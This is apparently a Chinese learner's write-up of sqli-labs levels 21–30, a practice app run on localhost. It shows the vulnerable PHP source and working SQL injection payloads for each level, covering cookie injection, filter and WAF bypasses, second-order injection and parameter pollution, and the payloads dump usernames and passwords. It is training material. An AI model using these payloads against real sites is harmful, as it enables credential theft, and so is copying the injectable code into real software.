SQLI-LAB 的实战记录(Less 21 - Less 30)

来源：互联网发布：苹果mac多少钱一台编辑：程序博客网时间：2024/05/22 01:42

Less - 21 Cookie Injection- Error Based- complex - string
- Test
- Sourse Code
- Solution
Less - 22 Cookie Injection- Error Based- Double Quotes - string
- Test
- Sourse Code
- Solution
Less - 23 Error Based- no comments
- Test
- Sourse Code
- Solution
Less - 24 Second Degree Injections
- Test
- Sourse Code
- Solution
Less - 25 Trick with OR AND
- Test
- Sourse Code
- Solution
Less - 25a Trick with OR AND Blind
- Test
- Sourse Code
- Solution
Less - 26 Trick with comments
- Test
- Sourse Code
- Solution
Less - 26a Trick with comments
- Test
- Sourse Code
- Solution
Less - 27 Trick with SELECT UNION
- Test
- Sourse Code
- Solution
Less - 27a Trick with SELECT UNION
- Test
- Sourse Code
- Solution
Less - 28 Trick with SELECT UNION
- Test
- Sourse Code
- Solution
Less - 28a Trick with SELECT UNION
- Test
- Sourse Code
- Solution
Less - 29 Protection with WAF
- Test
- Sourse Code
- Solution
Less - 30 Protection with WAF
- Test
- Sourse Code
- Solution

以下内容只是本人在做 sqli-lab 练习时写下的记录，仅供参考。
因为本人学过一些sql注入的内容，所以大部分内容是没有讲解的，如有不清楚的地方，请自行使用搜索引擎查询，相信会得到所需的内容。

（第21节：cookie注入 – 基于错误 – 复杂 - 字符串）

Test:

    http://localhost/sqli-lab/Less-21/index.php        uname=Dumb&passwd=Dumb&submit=Submit

YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
注： RHVtYg== 是 Dumb 经Base64加密后的值（密文后两位或一位等于号的就可以考虑 Base64）
Base64编码/解码器在线解码

    RHVtYlw=

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”Dumb\’) LIMIT 0,1’ at line 1
注： RHVtYlw= 是cookie中uname的值，明文 Dumb\
可以断定uname是有一层单引号和一层括号包裹

Sourse Code：

无cookie时 登录部分$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){    setcookie('uname', base64_encode($row1['username']), time()+3600);       print_r(mysql_error());               echo '<img src="../images/flag.jpg" />';}else{    print_r(mysql_error());    echo '<img src="../images/slap.jpg" />';   }有cookie时 登录部分：$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600;echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];           echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);$cookee = base64_decode($cookee);$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";$result=mysql_query($sql);if (!$result) {     die('Issue with your mysql: ' . mysql_error());}$row = mysql_fetch_array($result);if($row) {       echo 'Your Login name:'. $row['username'];         echo 'Your Password:' .$row['password'];     echo 'Your ID:' .$row['id'];} else{     echo '<img src="../images/slap1.jpg" />';}

Solution：

') or 1=1 #Jykgb3IgMT0xICM=其它：JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSw2IG9yIDE9MSAj明文   ') union select 1,database(),6 or 1=1 #JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=明文   ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgICM=明文   ') union select 1,group_concat(username),group_concat(password) from security.users  #

注：以上均为cookie中uname的值

（第22节：cookie注入 – 基于错误 – 双引号 - 字符串）

Test:

    http://localhost/sqli-lab/Less-21/index.php        uname=Dumb&passwd=Dumb&submit=Submit    RHVtYlw=

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“Dumb\” LIMIT 0,1’ at line 1
注： RHVtYlw= 是cookie中uname的值，明文 Dumb\
可以断定uname是有一层双引号包裹

Sourse Code：

无cookie登录时：$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1) {    setcookie('uname', base64_encode($row1['username']), time()+3600);       print_r(mysql_error());               echo '<img src="../images/flag.jpg" />';}else{    print_r(mysql_error());    echo '<img src="../images/slap.jpg" />';   }有cookie登录时：$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600;  echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];                  echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);$cookee = base64_decode($cookee);$cookee1 = '"'. $cookee. '"';$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";$result=mysql_query($sql);if (!$result) {     die('Issue with your mysql: ' . mysql_error());}$row = mysql_fetch_array($result);if($row) {     echo 'Your Login name:'. $row['username'];          echo 'Your Password:' .$row['password'];     echo 'Your ID:' .$row['id'];} else{    echo '<img src="../images/slap1.jpg" />';}

Solution：

IiBvciAxPTEgIw==明文   " or 1=1 #其它：IiB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDYgb3IgMT0xICM=明文   " union select 1,database(),6 or 1=1 #IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==明文   " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUpLGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyAgIw==明文   " union select 1,group_concat(username),group_concat(password) from security.users  #

注：以上均为cookie中uname的值

Less - 23 Error Based- no comments

（第23节：基于错误 – 无评论）

Test:

    http://localhost/sqli-lab/Less-23/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”2” LIMIT 0,1’ at line 1
注：能推断出 $id 周围是单引号

Sourse Code：

//filter the comments out so as to comments should not work$reg = "/#/";$reg1 = "/--/";$replace = "";$id = preg_replace($reg, $replace, $id);$id = preg_replace($reg1, $replace, $id);$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){      echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];}else{     print_r(mysql_error());}

Solution：

    '  or '1' = '    http://localhost/sqli-lab/Less-23/index.php?id='  or '1' = '    其它：    http://localhost/sqli-lab/Less-23/index.php?id='  union select 1,version(),3 or '1' = '    http://localhost/sqli-lab/Less-23/index.php?id='  union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

Less - 24 Second Degree Injections

（第24节：二次注入）

Test:

    http://localhost/sqli-lab/Less-24/index.php        username=wolf  password=1111

注：因为sqli-lab出的时间比较早，所用的php版本也比较早（可能是5.2），其中用到的一些函数已被废除，所以需要修改成类似的。

Sourse Code：

login_create.php     $link = mysqli_connect('localhost', 'root', '', 'security');     $username=  mysqli_real_escape_string($link,$_POST['username']) ;     $pass= mysqli_real_escape_string($link,$_POST['password']);     $re_pass= mysqli_real_escape_string($link,$_POST['re_password']);      $sql = "insert into users (username, password) values(\"$username\", \"$pass\")";login.php   $link = mysqli_connect('localhost', 'root', '', 'security');   $username = mysqli_real_escape_string($link,$_POST["login_user"]);   $password = mysqli_real_escape_string($link,$_POST["login_password"]);   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

Solution：

    username=admin" #  password=1111     重置密码 改 1111 到 任意（比如666）    username=admin  password=666 即可

Less - 25 Trick with OR & AND

（第25节：用 OR 和 AND 欺骗）

Test:

    http://localhost/sqli-lab/Less-25/index.php?id=1' #

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” LIMIT 0,1’ at line 1
注：id周围是单引号

    http://localhost/sqli-lab/Less-25/index.php?id=1' --+

注：无报错

Sourse Code：

function blacklist($id){    $id= preg_replace('/or/i',"", $id);    $id= preg_replace('/AND/i',"", $id);    return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {     echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];} else{     print_r(mysql_error());}

注：and和or会被过滤，有报错，$id被单引号包围

Solution：

    http://localhost/sqli-lab/Less-25/index.php?id=0' oorr 1=1 --+    http://localhost/sqli-lab/Less-25/index.php?id=2' aandnd 1=1 --+    其它：    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,version(),database()--+    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+

注：过滤了and和or，但只有一次，所以多重复就好

（第25节a：用 OR 和 AND 欺骗与盲注）

Test:

    http://localhost/sqli-lab/Less-25a/index.php?id=1    http://localhost/sqli-lab/Less-25a/index.php?id=2'    http://localhost/sqli-lab/Less-25a/index.php?id=2"    http://localhost/sqli-lab/Less-25a/index.php?id=2 oorr 1=1 #

注：id 周围没有符号有 or 和 and 过滤

Sourse Code：

function blacklist($id){    $id= preg_replace('/or/i',"", $id);    $id= preg_replace('/AND/i',"", $id);    return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {     echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];} else{}

注：and和or会被过滤，无报错

Solution：

    http://localhost/sqli-lab/Less-25a/index.php?id=0 oorr 1=1 --+    http://localhost/sqli-lab/Less-25a/index.php?id=2 aandnd 1=1 --+     其它：    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,version(),database() --+    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+

Less - 26 Trick with comments

（第26节：用评论欺骗）

Test:

     http://localhost/sqli-lab/Less-26/index.php?id=0'")And AND and  or OR select union  /// #--/*+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”)selectunion’ LIMIT 0,1’ at line 1
注：id周围只有单引号，过滤得只剩”)selectunion

Sourse Code：

function blacklist($id) {    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*    $id= preg_replace('/[--]/',"", $id);        //Strip out --    $id= preg_replace('/[#]/',"", $id);            //Strip out #    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes    return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {     echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];}else{       print_r(mysql_error());}

注：$id 周围是单引号，过滤了 or，and ， /* , – , # , 空格 , /

Solution：

    http://localhost/sqli-lab/Less-26/index.php?id=1'%26%26'1    其它：    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0UNION%A0SELECT%A01,version(),database()%26%26%a0'1    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0'1    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1

注：用%A0替代空格使用，用&&(%26%26)替代AND使用

Less - 26a Trick with comments

（第26a节：用评论欺骗）

Test:

    http://localhost/sqli-lab/Less-26a/index.php?id=1')")And AND and  or OR select union  /// #--/*+

注：被过滤得只剩’)”)selectunion 无sql查询报错

     http://localhost/sqli-lab/Less-26a/index.php?id=1'%A0%26%26%A0 '1'='1     http://localhost/sqli-lab/Less-26a/index.php?id=1"%A0%26%26%A0 "1"="1     http://localhost/sqli-lab/Less-26a/index.php?id=1")%A0%26%26%A0 ("1")=("1

注：都不报错，不知道格式是什么

    http://localhost/sqli-lab/Less-26a/index.php?id=0'%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0'1

注：都有php的报错，可能格式错了，查询不到

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1

注：这次对了

Sourse Code：

function blacklist($id){    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*    $id= preg_replace('/[--]/',"", $id);        //Strip out --    $id= preg_replace('/[#]/',"", $id);            //Strip out #    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes    return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {       echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];} else{}

注：$id 周围是单引号和括号，过滤了 or，and ， /* , – , # , 空格 , /

Solution：

    http://localhost/sqli-lab/Less-26a/index.php?id=1')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1    其它：    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,version(),database()%26%26%a0('1    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0('1    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0('1

Less - 27 Trick with SELECT & UNION

（第27节：用 UNION 和 SELECT 欺骗）

Test:

    http://localhost/sqli-lab/Less-27/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”)AndANDandorOROror’ LIMIT 0,1’ at line 1
注：Id的周围是单引号，会过滤union和select及有注释作用的符号

Sourse Code：

function blacklist($id){    $id= preg_replace('/[\/\*]/',"", $id);       //strip out /*    $id= preg_replace('/[--]/',"", $id);          //Strip out --.    $id= preg_replace('/[#]/',"", $id);           //Strip out #.    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.    $id= preg_replace('/select/m',"", $id);   //Strip out spaces.    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.    $id= preg_replace('/union/s',"", $id);    //Strip out union    $id= preg_replace('/select/s',"", $id);    //Strip out select    $id= preg_replace('/UNION/s',"", $id);  //Strip out UNION    $id= preg_replace('/SELECT/s',"", $id);   //Strip out SELECT    $id= preg_replace('/Union/s',"", $id);     //Strip out Union    $id= preg_replace('/Select/s',"", $id);     //Strip out select    return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {       echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];} else{     print_r(mysql_error());  }

Solution：

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0or(1)=(1)%26%26%a0'1    其它：    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0'1    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0'1    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1

Less - 27a Trick with SELECT & UNION

（第27a节：用 UNION 和 SELECT 欺骗）

Test:

    http://localhost/sqli-lab/Less-27a/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+

注：无sql查询报错，过滤后还剩 0’”)AndANDandorOROror

Sourse Code：

function blacklist($id){    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*    $id= preg_replace('/[--]/',"", $id);        //Strip out --.    $id= preg_replace('/[#]/',"", $id);            //Strip out #.    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.    $id= preg_replace('/select/m',"", $id);        //Strip out spaces.    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.    $id= preg_replace('/union/s',"", $id);        //Strip out union    $id= preg_replace('/select/s',"", $id);        //Strip out select    $id= preg_replace('/UNION/s',"", $id);        //Strip out UNION    $id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT    $id= preg_replace('/Union/s',"", $id);        //Strip out Union    $id= preg_replace('/Select/s',"", $id);        //Strip out Select    return $id;}$id= blacklist($id);$hint=$id;$id = '"' .$id. '"';$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {       echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];} else{}

Solution：

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0or(1)=(1)%26%26%a0"1    其它：    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0"1    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1

Less - 28 Trick with SELECT & UNION

（第28节：用 UNION 和 SELECT 欺骗）

Test:

    http://localhost/sqli-lab/Less-28/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+

注：过滤了union空格select 这种组合与全部空格，无sql查询报错

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect

注：UnIon%A0SeLect 中间不是空格了，没被过滤

    http://localhost/sqli-lab/Less-28/index.php?id=0'%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0'

注：有php报错

     http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('

注：这个对了，说明id周围是单引号和括号

Sourse Code：

function blacklist($id){    $id= preg_replace('/[\/\*]/',"", $id);                //strip out /*    $id= preg_replace('/[--]/',"", $id);                //Strip out --.    $id= preg_replace('/[#]/',"", $id);                    //Strip out #.    $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.    $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.    $id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.    return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){    echo 'Your Login name:'. $row['username'];    echo 'Your Password:' .$row['password'];}else{}

Solution：

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('    其它：    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0('1    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0('1

Less - 28a Trick with SELECT & UNION

（第28节a：用 UNION 和 SELECT 欺骗）

Test:

    http://localhost/sqli-lab/Less-28a/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select  /// #--?/*+

注： 过滤了union空格select 这种组合，无sql查询报错

    http://localhost/sqli-lab/Less-28a/index.php?id=1') --

注： 正常显示，没过滤空格和有注释作用的符号

Sourse Code：

function blacklist($id){    $id= preg_replace('/union\s+select/i',"", $id);    return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {     echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];} else{  }

Solution：

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,2,3--+    其它：    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,version(),database()--+    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(username),group_concat(password) from security.users where 1--+

Less - 29 Protection with WAF

（第29节：用WAF防护）

Test:

    http://localhost/sqli-lab/Less-29/login.php?id=0' union select 1,2,3 --+

注：被检测到有问题，跳转到其他的页面了

Sourse Code：

login.php//WAF implimentation with a whitelist approach..... only allows input to be Numeric.function whitelist($input) {    $match = preg_match("/^\d+$/", $input);    if($match) {    }else {           header('Location: hacked.php');    }}// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).function java_implimentation($query_string) {    $q_s = $query_string;    $qs_array= explode("&",$q_s);    foreach($qs_array as $key => $value) {        $val=substr($value,0,2);        if($val=="id") {            $id_value=substr($value,3,30);            return $id_value;            echo "<br>";            break;        }    }}$qs = $_SERVER['QUERY_STRING'];$hint=$qs;$id1=java_implimentation($qs);$id=$_GET['id'];whitelist($id1);$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {     echo 'Your Login name:'. $row['username'];     echo 'Your Password:' .$row['password'];} else{     print_r(mysql_error());}

Solution：

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,2,3 --+    其它：    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,version(),database() --+    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 30 Protection with WAF

（第30节：用WAF防护）

Test:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=6

注：显示的是id为6的内容

Sourse Code：

$qs = $_SERVER['QUERY_STRING'];$hint=$qs;$id1=java_implimentation($qs);$id=$_GET['id'];whitelist($id1);$id = '"' .$id. '"';$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) {        echo 'Your Login name:'. $row['username'];      echo 'Your Password:' .$row['password'];} else{    print_r(mysql_error());}//WAF implimentation with a whitelist approach..... only allows input to be Numeric.function whitelist($input) {    $match = preg_match("/^\d+$/", $input);    if($match) {    } else {           header('Location: hacked.php');    }}// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).function java_implimentation($query_string) {    $q_s = $query_string;    $qs_array= explode("&",$q_s);     foreach($qs_array as $key => $value) {        $val=substr($value,0,2);        if($val=="id") {            $id_value=substr($value,3,30);            return $id_value;            break;        }    }}

Solution：

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,2,3 --+    其它：    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,version(),database() --+    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

0 0

SQLI-LAB 的 实战记录(Less 21 - Less 30)

Less - 21 Cookie Injection- Error Based- complex - string

Test:

Sourse Code：

Solution：

Less - 22 Cookie Injection- Error Based- Double Quotes - string

Test:

Sourse Code：

Solution：

Less - 23 Error Based- no comments

Test:

Sourse Code：

Solution：

Less - 24 Second Degree Injections

Test:

Sourse Code：

Solution：

Less - 25 Trick with OR & AND

Test:

Sourse Code：

Solution：

Less - 25a Trick with OR & AND Blind

Test:

Sourse Code：

Solution：

Less - 26 Trick with comments

Test:

Sourse Code：

Solution：

Less - 26a Trick with comments

Test:

Sourse Code：

Solution：

Less - 27 Trick with SELECT & UNION

Test:

Sourse Code：

Solution：

Less - 27a Trick with SELECT & UNION

Test:

Sourse Code：

Solution：

Less - 28 Trick with SELECT & UNION

Test:

Sourse Code：

Solution：

Less - 28a Trick with SELECT & UNION

Test:

Sourse Code：

Solution：

Less - 29 Protection with WAF

Test:

Sourse Code：

Solution：

Less - 30 Protection with WAF

Test:

Sourse Code：

Solution：

SQLI-LAB 的实战记录(Less 21 - Less 30)